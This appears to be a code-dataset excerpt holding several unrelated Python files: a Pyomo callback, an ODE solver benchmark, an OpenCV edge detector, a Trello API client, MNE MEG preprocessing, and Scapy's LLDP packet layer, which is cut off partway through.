filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_22015
|
# ___________________________________________________________________________
#
# Pyomo: Python Optimization Modeling Objects
# Copyright 2017 National Technology and Engineering Solutions of Sandia, LLC
# Under the terms of Contract DE-NA0003525 with National Technology and
# Engineering Solutions of Sandia, LLC, the U.S. Government retains certain
# rights in this software.
# This software is distributed under the 3-clause BSD License.
# ___________________________________________________________________________
#@pyomobook:
def ph_rhosetter_callback(ph, scenario_tree, scenario):
MyRhoFactor = 1.0
root_node = scenario_tree.findRootNode()
si = scenario._instance
sm = si._ScenarioTreeSymbolMap
for i in si.ProductSizes:
ph.setRhoOneScenario(
root_node,
scenario,
sm.getSymbol(si.NumProducedFirstStage[i]),
si.UnitProductionCosts[i] * MyRhoFactor * 0.001)
for j in si.ProductSizes:
if j <= i:
ph.setRhoOneScenario(
root_node,
scenario,
sm.getSymbol(si.NumUnitsCutFirstStage[i,j]),
si.UnitReductionCost * MyRhoFactor * 0.001)
#@:pyomobook
|
the-stack_106_22016
|
import time
from collections import OrderedDict, namedtuple
import numpy as np
from pandas import DataFrame
from scipy.integrate import odeint, ode
import ggplot as gg
from scipy_ode import solve_ivp
HAS_ODES = False
try:
from scikits.odes.odeint import odeint as odes_odeint
from scikits.odes import ode as odes_ode
HAS_ODES = True
except:
pass
import egfngf_model
models = [
egfngf_model
]
class scipy_ode_int:
name = 'odeint'
def __call__(self, model, rtol):
def reordered_ode(t, y):
return model.f(y, t, model.k)
result = odeint(reordered_ode, model.y0, model.ts, rtol=rtol)
return result
class scipy_ode_class:
def __init__(self, name):
self.name = name
space_pos = name.find(" ")
if space_pos > -1:
self.solver = name[0:space_pos]
self.method = name[space_pos+1:]
else:
self.solver = name
self.method = None
def __call__(self, model, rtol):
def collected_ode(t, y):
return model.f(t, y, model.k)
solver = ode(collected_ode)
solver.set_integrator(self.solver, method=self.method, rtol=rtol,
atol=1e-6, nsteps=10000)
solver.set_initial_value(model.y0, 0.0)
result = np.empty((len(model.ts), len(model.y0)))
for i, t in enumerate(model.ts): # Drop t=0.0
if t == 0:
result[i, :] = model.y0
continue
result[i, :] = solver.integrate(t)
return result
class scipy_odes_class(scipy_ode_class):
def __call__(self, model, rtol):
solver = odes_ode(self.solver, model.f_odes, old_api=False,
lmm_type=self.method, rtol=rtol,
atol=1e-6, user_data=model.k)
solution = solver.solve(model.ts, model.y0)
for i, t in enumerate(model.ts):
try:
result[i, :] = solution.values.y[i]
except:
# no valid solution anymore
result[i, :] = 0
return result
class scipy_solver_class:
def __init__(self, name):
self.name = name
def __call__(self, model, rtol):
def combined_ode(t, y):
return model.f(t, y, model.k)
sol = solve_ivp(combined_ode, [0.0, np.max(model.ts)], model.y0, method=self.name, rtol=rtol, t_eval=model.ts)
return sol.y.transpose()
methods = [
scipy_ode_int(),
scipy_ode_class("vode bdf"),
scipy_ode_class("vode adams"),
scipy_ode_class("lsoda"),
scipy_ode_class("dopri5"),
scipy_ode_class("dop853"),
scipy_solver_class("RK45"),
scipy_solver_class("RK23"),
scipy_solver_class("Radau"),
scipy_solver_class("BDF"),
scipy_solver_class("LSODA"),
]
if HAS_ODES:
methods += [scipy_odes_class("cvode BDF"),
scipy_odes_class("cvode ADAMS"),
]
rtols = 10 ** np.arange(-9.0, 0.0)
GoldStandard = namedtuple('GoldStandard', ['name', 'values', 'max'])
gold_standards = []
for model in models:
print('Gold standard for {}'.format(model.name))
result = methods[0](model, 1e-12)
gold_standards.append((model.name, GoldStandard(model.name, result, np.max(result))))
gold_standards = OrderedDict(gold_standards)
data = []
for method in methods:
for model in models:
for rtol in rtols:
print('method: {} model: {} rtol: {}'.format(method.name, model.name, rtol), end='')
# Run
tic = time.time()
result = method(model, rtol)
toc = time.time() - tic
# Compare to gold standard
standard = gold_standards[model.name]
diff = result - standard.values
max_rel_diff = np.max(diff/standard.max)
# Append to table
record = (method.name, model.name, rtol, max_rel_diff, toc)
print(' err: {} toc: {}'.format(max_rel_diff, toc))
data.append(record)
data = DataFrame(data, columns=['method', 'model', 'rtol', 'err', 'time'])
print(gg.ggplot(data, gg.aes(x='err', y='time', color='method'))
+ gg.geom_point(size=60.0)
+ gg.geom_line()
+ gg.scale_x_log()
+ gg.scale_y_log()
+ gg.xlim(1e-10, 1e-2))
|
the-stack_106_22017
|
"""
For raspberry pi use:
import sys
sys.path.append('/home/pi/.local/lib/python3.9/site-packages')
"""
import cv2 as cv
import numpy as np
from PIL import Image, ImageEnhance
import time
import PRNTR
path1 = PRNTR.location
def ED():
#Canny edge detector
#load birds image
image = cv.imread("{}/files/new_test_resize.jpg".format(path1))
#convert to gray image
gray_image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
#detect edges
canny_edges = cv.Canny(gray_image, 120, 150) #change numbers to filter out the backgroud and adjust
sobel_x_edges = cv.Sobel(gray_image, cv.CV_64F,1, 0)
sobel_y_edges = cv.Sobel(gray_image, cv.CV_64F,0, 1)
#convert all -ve pixels to positives
sobel_x_edges = np.uint8(np.absolute(sobel_x_edges))
sobel_y_edges = np.uint8(np.absolute(sobel_y_edges))
#show edges
#cv.imshow("Canny Edges", canny_edges)
cv.imwrite("{}/files/Edgey.jpg".format(path1), canny_edges) #save the image file
#show images
#cv.imshow("Sobel X Edges", sobel_x_edges)
#cv.imshow("Sobel y Edges", sobel_y_edges)
#canny_edges.save('Canny_Edges.jpg')
#dont put 0 because the 'program' wont stop running and you will be stuck in a loop and have to TERMINATE operation.
cv.waitKey(1)
#cv.imwrite('sobel_x_edges', sobel_x_edges)
#cv.imwrite('sobel_y_edges', sobel_y_edges)
"""
#Laplacian edge detector
#detect gradients, edges
lap_edges = cv.Laplacian(gray_image, cv.CV_64F)
#convert all -ve pixels to positives
lap_edges = np.uint8(np.absolute(lap_edges))
cv.imshow("Laplacian Edges", lap_edges)
#cv.imwrite("{}/files/edgey2.jpg".format(path1), lap_edges) #save the image file but make sure to use the location you want to save it to.
cv.waitKey(0)
"""
if __name__ == '__main__':
ED()
|
the-stack_106_22019
|
import json
import re
import requests
from six.moves.urllib.parse import quote, quote_plus
from blackbelt.config import config
from blackbelt.errors import ConfigurationError
class Trello(object):
"""
I represent a authenticated connection to Trello API.
Dispatch all requests to it through my methods.
My actions are named from the BlackBelt's POW; I don't aim to be a full,
usable client.
"""
API_KEY = "2e4bb3b8ec5fe2ff6c04bf659ee4553b"
APP_NAME = 'black-belt'
URL_PREFIX = "https://trello.com/1"
def __init__(self, access_token=None):
self._access_token = access_token
if not self._access_token and config.get('trello') and config['trello'].get('access_token'):
self._access_token = config['trello']['access_token']
### Infra
def do_request(self, url, method='get', data=None):
if not self._access_token:
raise ConfigurationError("Trying to talk to Trello without having access token")
url = self.URL_PREFIX + url
response = getattr(requests, method)(
url,
params={
'key': self.API_KEY,
'token': self._access_token
},
data=data
)
# try:
# print response.text
# except Exception:
# print 'Cannot print'
response.raise_for_status()
return json.loads(response.content)
def get_card_id(self, card_url):
# Trailing .* to accept longlings as well. Brittle, but that's how they work
# See https://twitter.com/almadcz/status/537187876191350784
match = re.match(r"^https://trello.com/c/(?P<id>\w+)/?(.*)", card_url)
if match:
return match.groupdict()['id']
else:
return quote(card_url)
### Users & Tokens
def get_token_url(self, app_name, expires='30days'):
""" Return URL for retrieving access token """
return 'https://trello.com/1/authorize?key=%(key)s&name=%(name)s&expiration=%(expires)s&response_type=token&scope=%(scope)s' % {
'key': self.API_KEY,
'name': quote_plus(self.APP_NAME),
'expires': expires,
'scope': 'read,write'
}
def get_myself(self):
return self.do_request("/tokens/%s/member" % self._access_token)
def get_member(self, member_name):
return self.do_request("/members/%s" % member_name)
### Boards
def get_board(self, board_id):
return self.do_request("/boards/%s" % board_id)
### Columns
def get_columns(self, board_id):
return self.do_request("/boards/%s/lists" % board_id)
def get_column(self, column_id):
return self.do_request("/lists/%s" % column_id)
### Cards
def get_card(self, card_id=None, card_url=None):
if card_url and not card_id:
card_id = self.get_card_id(card_url)
return self.do_request("/cards/%s" % card_id)
def get_cards(self, column_id):
return self.do_request("/lists/%s/cards" % column_id)
def create_card(self, name, description, list_id):
return self.do_request(
'/cards',
method='post',
data={
'name': name,
'desc': description,
'idList': list_id
}
)
def move_card(self, card_id, board_id=None, column_id=None):
"""
Move card to the given column on another board.
If no column is given, it will be placed in the first one.
If no board is given, column is assumed to be on the same boards.
"""
if board_id:
self.do_request("/cards/%s/idBoard" % card_id, data={'value': board_id}, method='put')
if column_id:
self.do_request("/cards/%s/idList" % card_id, data={'value': column_id}, method='put')
def comment_card(self, card_id, comment):
self.do_request("/cards/%s/actions/comments" % card_id, method='post', data={'text': comment})
def add_card_member(self, card_id, member_id):
self.do_request(
"/cards/%s/members" % card_id,
method='post',
data={
'value': member_id
}
)
def label_card(self, card_id, label):
self.do_request(
"/cards/%s/labels" % card_id,
method='post',
data={
'value': label
}
)
### Checklists
def create_item(self, checklist_id, name, pos):
""" Create new item in the given checklist on given position """
return self.do_request(
url="/checklists/%s/checkItems" % checklist_id,
method='post',
data={
'name': name,
'post': pos
}
)
def check_item(self, card_id, checklist_id, item_id):
""" Mark item in the given checklist as complete """
# OK, WTF
# This is kinda underdocumented, method is not present in API,
# but inspecting the requests in live trello says yes, they do
# https://trello.com/1/cards/5352e7118793950e77eb1c31/checklist/5352e75978962c0c7778f601/checkItem/5352fb5abb1fb4ca20b7be44
self.do_request(
"/cards/%(card_id)s/checklist/%(checklist_id)s/checkItem/%(item_id)s" % {
'checklist_id': checklist_id,
'item_id': item_id,
'card_id': card_id
},
method='put',
data={
'state': 'complete'
}
)
def get_card_checklists(self, card_id):
return self.do_request('/cards/%s/checklists' % card_id)
def get_checklist_items(self, checklist_id):
return self.do_request('/checklists/%s/checkItems' % checklist_id)
def delete_checklist_item(self, checklist_id, checklist_item_id):
return self.do_request(
"/checklists/%s/checkItems/%s" % (checklist_id, checklist_item_id),
method='delete'
)
def add_column(self, board_id, name, position):
""" Add position^th column to the board_id. Position is 1-indexed """
# Position is not just an integer as in 3 for 3rd from the left,
# but we ultimately want our API to look act that way
# Therefore, find out position-1 & increment
columns = self.get_columns(board_id=board_id)
trello_position = 'bottom' # default
if len(columns) >= position - 1 and position > 1:
# -2: -1 for prev card, additional -1 because list is 0-indexed
# +1 for pos as we want to have it behind it
trello_position = columns[position - 2]['pos'] + 1
return self.do_request(
"/boards/%s/lists" % (board_id,),
method='post',
data={
'name': name,
'pos': trello_position
}
)
|
the-stack_106_22020
|
from __future__ import print_function
class BoundObjAndStoredGlobals(object):
def __init__(self, obj, globals_, exclusions={'In', 'Out'}):
self.obj = obj
self.globals_ = globals_
self.exclusions = exclusions
self.exclusions.update(k for k in globals_ if k.startswith('_'))
def safe_keys(self):
return [k for k in self.globals_ if k not in self.exclusions]
def __enter__(self):
# store existing global variables
self.stored_globals = {}
for _k in self.safe_keys():
self.stored_globals[_k] = self.globals_[_k]
del self.globals_[_k]
# import the variables from obj
for _k in self.obj:
self.globals_[_k]= self.obj[_k]
return self
def __exit__(self, *args):
# update obj and remove the temporary global variables
for _k in self.safe_keys():
if self.globals_[_k] is not self:
self.obj[_k] = self.globals_[_k]
del self.globals_[_k]
# restore the stored global variables
for _k in self.stored_globals:
self.globals_[_k] = self.stored_globals[_k]
return
def __getattr__(self, attr):
return getattr(self.stored_globals, attr)
if __name__=='__main__':
d = dict(a=1, b=2, c=3)
print([k for k in globals().keys() if not k.startswith('_')])
print(d)
with BoundObjAndStoredGlobals(d, globals()) as context:
print(context.keys())
print([k for k in globals().keys() if not k.startswith('_')])
del k
d = 4 # noqa
e = b + c # noqa
print(d)
print([k for k in globals().keys() if not k.startswith('_')])
|
the-stack_106_22021
|
import mne
import os.path as op
from autoreject import get_rejection_threshold
subject = 'CC110037'
kind = 'rest'
raw = mne.io.read_raw_fif(
'/storage/local/camcan/data/'
'{0:s}/{1:s}/{2:s}_raw.fif'.format(subject, kind, kind))
mne.channels.fix_mag_coil_types(raw.info)
raw.info['bads'] = ['MEG1031', 'MEG1111', 'MEG1941']
sss_params_dir = '/storage/local/camcan/maxfilter'
cal = op.join(sss_params_dir, 'sss_params', 'sss_cal.dat')
ctc = op.join(sss_params_dir, 'sss_params', 'ct_sparse.fif')
raw = mne.preprocessing.maxwell_filter(
raw, calibration=cal,
cross_talk=ctc,
st_duration=10.,
st_correlation=.98,
destination=None,
coord_frame='head')
eog_epochs = mne.preprocessing.create_eog_epochs(raw)
if len(eog_epochs) >= 5:
reject_eog = get_rejection_threshold(eog_epochs, decim=8)
del reject_eog['eog'] # we don't want to reject eog based on eog.
else:
reject_eog = None
ecg_epochs = mne.preprocessing.create_ecg_epochs(raw)
if len(ecg_epochs) >= 5:
reject_ecg = get_rejection_threshold(ecg_epochs, decim=8)
# here we want the eog.
else:
reject_ecg = None
if reject_eog is None:
reject_eog = {k: v for k, v in
reject_ecg.items() if k != 'eog'}
proj_eog, _ = mne.preprocessing.compute_proj_eog(
raw, average=True, reject=reject_eog, n_mag=1, n_grad=1, n_eeg=1)
proj_ecg, _ = mne.preprocessing.compute_proj_ecg(
raw, average=True, reject=reject_ecg, n_mag=1, n_grad=1, n_eeg=1)
raw.add_proj(proj_eog)
raw.add_proj(proj_ecg)
|
the-stack_106_22023
|
# scapy.contrib.description = Link Layer Discovery Protocol (LLDP)
# scapy.contrib.status = loads
"""
LLDP - Link Layer Discovery Protocol
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:author: Thomas Tannhaeuser, [email protected]
:license: GPLv2
This module is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
:description:
This module provides Scapy layers for the LLDP protocol.
normative references:
- IEEE 802.1AB 2016 - LLDP protocol, topology and MIB description
:TODO:
- | organization specific TLV e.g. ProfiNet
| (see LLDPDUGenericOrganisationSpecific for a starting point)
- Ignore everything after EndofLLDPDUTLV
:NOTES:
- you can find the layer configuration options at the end of this file
- default configuration enforces standard conform:
* | frame structure
| (ChassisIDTLV/PortIDTLV/TimeToLiveTLV/...)
* multiplicity of TLVs (if given by the standard)
* min sizes of strings used by the TLVs
- conf.contribs['LLDP'].strict_mode_disable() -> disable strict mode
"""
from scapy.config import conf
from scapy.error import Scapy_Exception
from scapy.layers.l2 import Ether, Dot1Q
from scapy.fields import MACField, IPField, BitField, \
StrLenField, ByteEnumField, BitEnumField, \
EnumField, ThreeBytesField, BitFieldLenField, \
ShortField, XStrLenField, ByteField, ConditionalField, \
MultipleTypeField
from scapy.packet import Packet, bind_layers
from scapy.modules.six.moves import range
from scapy.data import ETHER_TYPES
from scapy.compat import orb
LLDP_NEAREST_BRIDGE_MAC = '01:80:c2:00:00:0e'
LLDP_NEAREST_NON_TPMR_BRIDGE_MAC = '01:80:c2:00:00:03'
LLDP_NEAREST_CUSTOMER_BRIDGE_MAC = '01:80:c2:00:00:00'
LLDP_ETHER_TYPE = 0x88cc
ETHER_TYPES[LLDP_ETHER_TYPE] = 'LLDP'
class LLDPInvalidFrameStructure(Scapy_Exception):
"""
basic frame structure not standard conform
(missing TLV, invalid order or multiplicity)
"""
pass
class LLDPMissingLowerLayer(Scapy_Exception):
"""
first layer below first LLDPDU must be Ethernet or Dot1q
"""
pass
class LLDPInvalidTLVCount(Scapy_Exception):
"""
invalid number of entries for a specific TLV type
"""
pass
class LLDPInvalidLengthField(Scapy_Exception):
"""
invalid value of length field
"""
pass
class LLDPDU(Packet):
"""
base class for all LLDP data units
"""
TYPES = {
0x00: 'end of LLDPDU',
0x01: 'chassis id',
0x02: 'port id',
0x03: 'time to live',
0x04: 'port description',
0x05: 'system name',
0x06: 'system description',
0x07: 'system capabilities',
0x08: 'management address',
range(0x09, 0x7e): 'reserved - future standardization',
127: 'organisation specific TLV'
}
DOT1Q_HEADER_LEN = 4
ETHER_HEADER_LEN = 14
ETHER_FSC_LEN = 4
ETHER_FRAME_MIN_LEN = 64
LAYER_STACK = []
LAYER_MULTIPLICITIES = {}
def guess_payload_class(self, payload):
# type is a 7-bit bitfield spanning bits 1..7 -> div 2
try:
lldpdu_tlv_type = orb(payload[0]) // 2
return LLDPDU_CLASS_TYPES.get(lldpdu_tlv_type, conf.raw_layer)
except IndexError:
return conf.raw_layer
@staticmethod
def _dot1q_headers_size(layer):
"""
calculate size of lower dot1q layers (if present)
:param layer: the layer to start at
:return: size of vlan headers, layer below lowest vlan header
"""
vlan_headers_size = 0
under_layer = layer
while under_layer and isinstance(under_layer, Dot1Q):
vlan_headers_size += LLDPDU.DOT1Q_HEADER_LEN
under_layer = under_layer.underlayer
return vlan_headers_size, under_layer
def post_build(self, pkt, pay):
under_layer = self.underlayer
if under_layer is None:
if conf.contribs['LLDP'].strict_mode():
raise LLDPMissingLowerLayer('No lower layer (Ethernet '
'or Dot1Q) provided.')
else:
return pkt + pay
if isinstance(under_layer, LLDPDU):
return pkt + pay
frame_size, under_layer = LLDPDU._dot1q_headers_size(under_layer)
if not under_layer or not isinstance(under_layer, Ether):
if conf.contribs['LLDP'].strict_mode():
raise LLDPMissingLowerLayer('No Ethernet layer provided.')
else:
return pkt + pay
frame_size += LLDPDU.ETHER_HEADER_LEN
frame_size += len(pkt) + len(pay) + LLDPDU.ETHER_FSC_LEN
if frame_size < LLDPDU.ETHER_FRAME_MIN_LEN:
return pkt + pay + b'\x00' * (LLDPDU.ETHER_FRAME_MIN_LEN - frame_size) # noqa: E501
return pkt + pay
@staticmethod
def _frame_structure_check(structure_description):
"""
check if the structure of the frame is conform to the basic
frame structure defined by the standard
:param structure_description: string-list reflecting LLDP-msg structure
"""
standard_frame_structure = [LLDPDUChassisID.__name__,
LLDPDUPortID.__name__,
LLDPDUTimeToLive.__name__,
'<...>']
if len(structure_description) < 3:
raise LLDPInvalidFrameStructure(
'Invalid frame structure.\ngot: {}\nexpected: '
'{}'.format(' '.join(structure_description),
' '.join(standard_frame_structure)))
for idx, layer_name in enumerate(standard_frame_structure):
if layer_name == '<...>':
break
if layer_name != structure_description[idx]:
raise LLDPInvalidFrameStructure(
'Invalid frame structure.\ngot: {}\nexpected: '
'{}'.format(' '.join(structure_description),
' '.join(standard_frame_structure)))
@staticmethod
def _tlv_multiplicities_check(tlv_type_count):
"""
check if multiplicity of present TLVs conforms to the standard
:param tlv_type_count: dict containing counte-per-TLV
"""
# * : 0..n, 1 : one and only one.
standard_multiplicities = {
LLDPDUEndOfLLDPDU.__name__: '*',
LLDPDUChassisID.__name__: 1,
LLDPDUPortID.__name__: 1,
LLDPDUTimeToLive.__name__: 1,
LLDPDUPortDescription: '*',
LLDPDUSystemName: '*',
LLDPDUSystemDescription: '*',
LLDPDUSystemCapabilities: '*',
LLDPDUManagementAddress: '*'
}
for tlv_type_name in standard_multiplicities:
standard_tlv_multiplicity = \
standard_multiplicities[tlv_type_name]
if standard_tlv_multiplicity == '*':
continue
try:
if tlv_type_count[tlv_type_name] != standard_tlv_multiplicity:
raise LLDPInvalidTLVCount(
'Invalid number of entries for TLV type '
'{} - expected {} entries, got '
'{}'.format(tlv_type_name,
standard_tlv_multiplicity,
tlv_type_count[tlv_type_name]))
except KeyError:
raise LLDPInvalidTLVCount('Missing TLV layer of type '
'{}.'.format(tlv_type_name))
def pre_dissect(self, s):
if conf.contribs['LLDP'].strict_mode():
if self.__class__.__name__ == 'LLDPDU':
LLDPDU.LAYER_STACK = []
LLDPDU.LAYER_MULTIPLICITIES = {}
else:
LLDPDU.LAYER_STACK.append(self.__class__.__name__)
try:
LLDPDU.LAYER_MULTIPLICITIES[self.__class__.__name__] += 1
except KeyError:
LLDPDU.LAYER_MULTIPLICITIES[self.__class__.__name__] = 1
return s
def dissection_done(self, pkt):
if self.__class__.__name__ == 'LLDPDU' and \
conf.contribs['LLDP'].strict_mode():
LLDPDU._frame_structure_check(LLDPDU.LAYER_STACK)
LLDPDU._tlv_multiplicities_check(LLDPDU.LAYER_MULTIPLICITIES)
super(LLDPDU, self).dissection_done(pkt)
def _check(self):
"""Overwrited by LLDPU objects"""
pass
def post_dissect(self, s):
self._check()
return super(LLDPDU, self).post_dissect(s)
def do_build(self):
self._check()
return super(LLDPDU, self).do_build()
def _ldp_id_adjustlen(pkt, x):
"""Return the length of the `id` field,
according to its real encoded type"""
f, v = pkt.getfield_and_val('id')
length = f.i2len(pkt, v) + 1
if (isinstance(pkt, LLDPDUPortID) and pkt.subtype == 0x4) or \
(isinstance(pkt, LLDPDUChassisID) and pkt.subtype == 0x5):
# Take the ConditionalField into account
length += 1
return length
class LLDPDUChassisID(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.2 / p. 26
"""
LLDP_CHASSIS_ID_TLV_SUBTYPES = {
0x00: 'reserved',
0x01: 'chassis component',
0x02: 'interface alias',
0x03: 'port component',
0x04: 'MAC address',
0x05: 'network address',
0x06: 'interface name',
0x07: 'locally assigned',
range(0x08, 0xff): 'reserved'
}
SUBTYPE_RESERVED = 0x00
SUBTYPE_CHASSIS_COMPONENT = 0x01
SUBTYPE_INTERFACE_ALIAS = 0x02
SUBTYPE_PORT_COMPONENT = 0x03
SUBTYPE_MAC_ADDRESS = 0x04
SUBTYPE_NETWORK_ADDRESS = 0x05
SUBTYPE_INTERFACE_NAME = 0x06
SUBTYPE_LOCALLY_ASSIGNED = 0x07
fields_desc = [
BitEnumField('_type', 0x01, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='id',
adjust=lambda pkt, x: _ldp_id_adjustlen(pkt, x)),
ByteEnumField('subtype', 0x00, LLDP_CHASSIS_ID_TLV_SUBTYPES),
ConditionalField(
ByteField('family', 0),
lambda pkt: pkt.subtype == 0x05
),
MultipleTypeField([
(
MACField('id', None),
lambda pkt: pkt.subtype == 0x04
),
(
IPField('id', None),
lambda pkt: pkt.subtype == 0x05
),
], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is
None else pkt._length - 1)
)
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and not self.id:
raise LLDPInvalidLengthField('id must be >= 1 characters long')
class LLDPDUPortID(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.3 / p. 26
"""
LLDP_PORT_ID_TLV_SUBTYPES = {
0x00: 'reserved',
0x01: 'interface alias',
0x02: 'port component',
0x03: 'MAC address',
0x04: 'network address',
0x05: 'interface name',
0x06: 'agent circuit ID',
0x07: 'locally assigned',
range(0x08, 0xff): 'reserved'
}
SUBTYPE_RESERVED = 0x00
SUBTYPE_INTERFACE_ALIAS = 0x01
SUBTYPE_PORT_COMPONENT = 0x02
SUBTYPE_MAC_ADDRESS = 0x03
SUBTYPE_NETWORK_ADDRESS = 0x04
SUBTYPE_INTERFACE_NAME = 0x05
SUBTYPE_AGENT_CIRCUIT_ID = 0x06
SUBTYPE_LOCALLY_ASSIGNED = 0x07
fields_desc = [
BitEnumField('_type', 0x02, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='id',
adjust=lambda pkt, x: _ldp_id_adjustlen(pkt, x)),
ByteEnumField('subtype', 0x00, LLDP_PORT_ID_TLV_SUBTYPES),
ConditionalField(
ByteField('family', 0),
lambda pkt: pkt.subtype == 0x04
),
MultipleTypeField([
(
MACField('id', None),
lambda pkt: pkt.subtype == 0x03
),
(
IPField('id', None),
lambda pkt: pkt.subtype == 0x04
),
], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is
None else pkt._length - 1)
)
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and not self.id:
raise LLDPInvalidLengthField('id must be >= 1 characters long')
class LLDPDUTimeToLive(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.4 / p. 29
"""
fields_desc = [
BitEnumField('_type', 0x03, 7, LLDPDU.TYPES),
BitField('_length', 0x02, 9),
ShortField('ttl', 20)
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and self._length != 2:
raise LLDPInvalidLengthField('length must be 2 - got '
'{}'.format(self._length))
class LLDPDUEndOfLLDPDU(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.1 / p. 26
"""
fields_desc = [
BitEnumField('_type', 0x00, 7, LLDPDU.TYPES),
BitField('_length', 0x00, 9),
]
def extract_padding(self, s):
return '', s
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and self._length != 0:
raise LLDPInvalidLengthField('length must be 0 - got '
'{}'.format(self._length))
class LLDPDUPortDescription(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.5 / p. 29
"""
fields_desc = [
BitEnumField('_type', 0x04, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='description'),
StrLenField('description', '', length_from=lambda pkt: pkt._length)
]
class LLDPDUSystemName(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.6 / p. 30
"""
fields_desc = [
BitEnumField('_type', 0x05, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='system_name'),
StrLenField('system_name', '', length_from=lambda pkt: pkt._length)
]
class LLDPDUSystemDescription(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.7 / p. 31
"""
fields_desc = [
BitEnumField('_type', 0x06, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='description'),
StrLenField('description', '', length_from=lambda pkt: pkt._length)
]
class LLDPDUSystemCapabilities(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.8 / p. 31
"""
fields_desc = [
BitEnumField('_type', 0x07, 7, LLDPDU.TYPES),
BitFieldLenField('_length', 4, 9),
BitField('reserved_5_available', 0, 1),
BitField('reserved_4_available', 0, 1),
BitField('reserved_3_available', 0, 1),
BitField('reserved_2_available', 0, 1),
BitField('reserved_1_available', 0, 1),
BitField('two_port_mac_relay_available', 0, 1),
BitField('s_vlan_component_available', 0, 1),
BitField('c_vlan_component_available', 0, 1),
BitField('station_only_available', 0, 1),
BitField('docsis_cable_device_available', 0, 1),
BitField('telephone_available', 0, 1),
BitField('router_available', 0, 1),
BitField('wlan_access_point_available', 0, 1),
BitField('mac_bridge_available', 0, 1),
BitField('repeater_available', 0, 1),
BitField('other_available', 0, 1),
BitField('reserved_5_enabled', 0, 1),
BitField('reserved_4_enabled', 0, 1),
BitField('reserved_3_enabled', 0, 1),
BitField('reserved_2_enabled', 0, 1),
BitField('reserved_1_enabled', 0, 1),
BitField('two_port_mac_relay_enabled', 0, 1),
BitField('s_vlan_component_enabled', 0, 1),
BitField('c_vlan_component_enabled', 0, 1),
BitField('station_only_enabled', 0, 1),
BitField('docsis_cable_device_enabled', 0, 1),
BitField('telephone_enabled', 0, 1),
BitField('router_enabled', 0, 1),
BitField('wlan_access_point_enabled', 0, 1),
BitField('mac_bridge_enabled', 0, 1),
BitField('repeater_enabled', 0, 1),
BitField('other_enabled', 0, 1),
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode() and self._length != 4:
raise LLDPInvalidLengthField('length must be 4 - got '
'{}'.format(self._length))
class LLDPDUManagementAddress(LLDPDU):
"""
ieee 802.1ab-2016 - sec. 8.5.9 / p. 32
currently only 0x00..0x1e are used by standards, no way to
use anything > 0xff as management address subtype is only
one octet wide
see https://www.iana.org/assignments/address-family-numbers/address-family-numbers.xhtml # noqa: E501
"""
IANA_ADDRESS_FAMILY_NUMBERS = {
0x00: 'other',
0x01: 'IPv4',
0x02: 'IPv6',
0x03: 'NSAP',
0x04: 'HDLC',
0x05: 'BBN',
0x06: '802',
0x07: 'E.163',
0x08: 'E.164',
0x09: 'F.69',
0x0a: 'X.121',
0x0b: 'IPX',
0x0c: 'Appletalk',
0x0d: 'Decnet IV',
0x0e: 'Banyan Vines',
0x0f: 'E.164 with NSAP',
0x10: 'DNS',
0x11: 'Distinguished Name',
0x12: 'AS Number',
0x13: 'XTP over IPv4',
0x14: 'XTP over IPv6',
0x15: 'XTP native mode XTP',
0x16: 'Fiber Channel World-Wide Port Name',
0x17: 'Fiber Channel World-Wide Node Name',
0x18: 'GWID',
0x19: 'AFI for L2VPN',
0x1a: 'MPLS-TP Section Endpoint ID',
0x1b: 'MPLS-TP LSP Endpoint ID',
0x1c: 'MPLS-TP Pseudowire Endpoint ID',
0x1d: 'MT IP Multi-Topology IPv4',
0x1e: 'MT IP Multi-Topology IPv6'
}
SUBTYPE_MANAGEMENT_ADDRESS_OTHER = 0x00
SUBTYPE_MANAGEMENT_ADDRESS_IPV4 = 0x01
SUBTYPE_MANAGEMENT_ADDRESS_IPV6 = 0x02
SUBTYPE_MANAGEMENT_ADDRESS_NSAP = 0x03
SUBTYPE_MANAGEMENT_ADDRESS_HDLC = 0x04
SUBTYPE_MANAGEMENT_ADDRESS_BBN = 0x05
SUBTYPE_MANAGEMENT_ADDRESS_802 = 0x06
SUBTYPE_MANAGEMENT_ADDRESS_E_163 = 0x07
SUBTYPE_MANAGEMENT_ADDRESS_E_164 = 0x08
SUBTYPE_MANAGEMENT_ADDRESS_F_69 = 0x09
SUBTYPE_MANAGEMENT_ADDRESS_X_121 = 0x0A
SUBTYPE_MANAGEMENT_ADDRESS_IPX = 0x0B
SUBTYPE_MANAGEMENT_ADDRESS_APPLETALK = 0x0C
SUBTYPE_MANAGEMENT_ADDRESS_DECNET_IV = 0x0D
SUBTYPE_MANAGEMENT_ADDRESS_BANYAN_VINES = 0x0E
SUBTYPE_MANAGEMENT_ADDRESS_E_164_WITH_NSAP = 0x0F
SUBTYPE_MANAGEMENT_ADDRESS_DNS = 0x10
